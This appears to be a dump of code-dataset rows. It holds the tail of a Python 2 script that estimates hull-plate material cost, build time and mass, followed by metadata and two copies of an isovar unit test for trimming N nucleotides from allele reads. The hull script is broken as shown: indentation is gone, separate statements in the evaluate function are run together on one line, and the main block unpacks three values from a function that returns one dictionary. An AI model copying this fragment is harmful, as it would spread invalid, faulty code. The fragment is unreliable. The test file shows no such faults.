sheets = self.material_sheets(self.material_areas(plates))
for key in sheets.iterkeys():
matl = self.materials[key]
thickness = key[1]
volume = thickness * matl["length"] * matl["width"]
volume *= sheets[key]
mass = volume * self.material_types[key[0]]["density"]
matlcost = mass * matl["cost"]
cost += matlcost
time = max(time, matl["leadtime"])
return (cost, time)
def mass(plates, materials):
""" compute mass of each plate based on material data """
totalmass = 0
matl_data = dict([(row[0], row[1:]) for row in materials])
for plate in plates:
matl = plate.get("material", "MIL_DTL_12560")
this_matl_data = matl_data.get(matl, [-1, "x", "x", 0.0])
density = this_matl_data[-1]
thickness = plate.get("thickness", 1.5)
area = plate.get("area", 0)
volume = thickness * area
plate["mass"] = volume * density
totalmass += plate["mass"]
return totalmass
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("hullplates", type=argparse.FileType("r"),
help="json list of plates in the hull")
parser.add_argument("-d", "--model-data",
type=argparse.FileType("r"),
default="hull_cost_data.json",
help="json cost model data")
return parser.parse_args()
def evaluate(plates, tables):
model = HullCostAndTime(tables)
plates = model.prepare_plates(plates)
build = model.build_cost_and_lead_time(plates)
material = model.material_cost_and_lead_time(plates)
matl_cost = material[0]
matl_time = material[1] * 7 build_cost = build["cost"]
build_time = build["time"] / 8.0 total_mass = mass(plates, tables["material_type"])
report = {}
report["plates"] = plates
report["Build"] = build["table"]
report["Build Cost"] = build_cost
report["Build Time"] = build_time
report["Material Cost"] = matl_cost
report["Material Lead Time"] = matl_time
report["Total Cost"] = build_cost + matl_cost
report["Total Time"] = build_time + matl_time
report["Total Mass"] = total_mass * 0.453592
return report
if __name__ == "__main__":
args = get_args()
plates = json.load(args.hullplates)
tables = json.load(args.model_data)
build, material, report = evaluate(plates, tables)
print report
| false | true |
1c4aab8843fa67ec04a2e6b2e8f6b2aacade81f0 | 1,013 | py | Python | test/test_allele_reads.py | carnivorouspeanut/isovar_comp | 74fcc12ef52d08eb4cfa85bdcda8903970babbda | [
"Apache-2.0"
] | null | null | null | test/test_allele_reads.py | carnivorouspeanut/isovar_comp | 74fcc12ef52d08eb4cfa85bdcda8903970babbda | [
"Apache-2.0"
] | null | null | null | test/test_allele_reads.py | carnivorouspeanut/isovar_comp | 74fcc12ef52d08eb4cfa85bdcda8903970babbda | [
"Apache-2.0"
] | null | null | null |
from isovar.allele_reads import AlleleRead
from isovar.locus_reads import LocusRead
from nose.tools import eq_
def make_read_at_locus(prefix, alt, suffix, base_quality=30, name="dummy"):
dummy_sequence = prefix + alt + suffix
return LocusRead(
name="dummy",
sequence=dummy_sequence,
reference_positions=list(range(1, len(dummy_sequence) + 1)),
quality_scores=[base_quality] * len(dummy_sequence),
base0_read_position_before_variant=len(prefix) - 1,
base0_read_position_after_variant=len(prefix) + len(alt),
)
def test_allele_read_from_single_read_at_locus_trim_N_nucleotides():
read_at_locus = make_read_at_locus(prefix="NCCN", alt="A", suffix="TNNA")
allele_read = AlleleRead.from_locus_read(read_at_locus, n_ref=1)
print(allele_read)
expected = AlleleRead(prefix="", allele="A", suffix="T", name="dummy")
eq_(allele_read, expected)
if __name__ == "__main__":
test_allele_read_from_single_read_at_locus_trim_N_nucleotides()
| 38.961538 | 77 | 0.740375 |
from isovar.allele_reads import AlleleRead
from isovar.locus_reads import LocusRead
from nose.tools import eq_
def make_read_at_locus(prefix, alt, suffix, base_quality=30, name="dummy"):
dummy_sequence = prefix + alt + suffix
return LocusRead(
name="dummy",
sequence=dummy_sequence,
reference_positions=list(range(1, len(dummy_sequence) + 1)),
quality_scores=[base_quality] * len(dummy_sequence),
base0_read_position_before_variant=len(prefix) - 1,
base0_read_position_after_variant=len(prefix) + len(alt),
)
def test_allele_read_from_single_read_at_locus_trim_N_nucleotides():
read_at_locus = make_read_at_locus(prefix="NCCN", alt="A", suffix="TNNA")
allele_read = AlleleRead.from_locus_read(read_at_locus, n_ref=1)
print(allele_read)
expected = AlleleRead(prefix="", allele="A", suffix="T", name="dummy")
eq_(allele_read, expected)
if __name__ == "__main__":
test_allele_read_from_single_read_at_locus_trim_N_nucleotides()
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.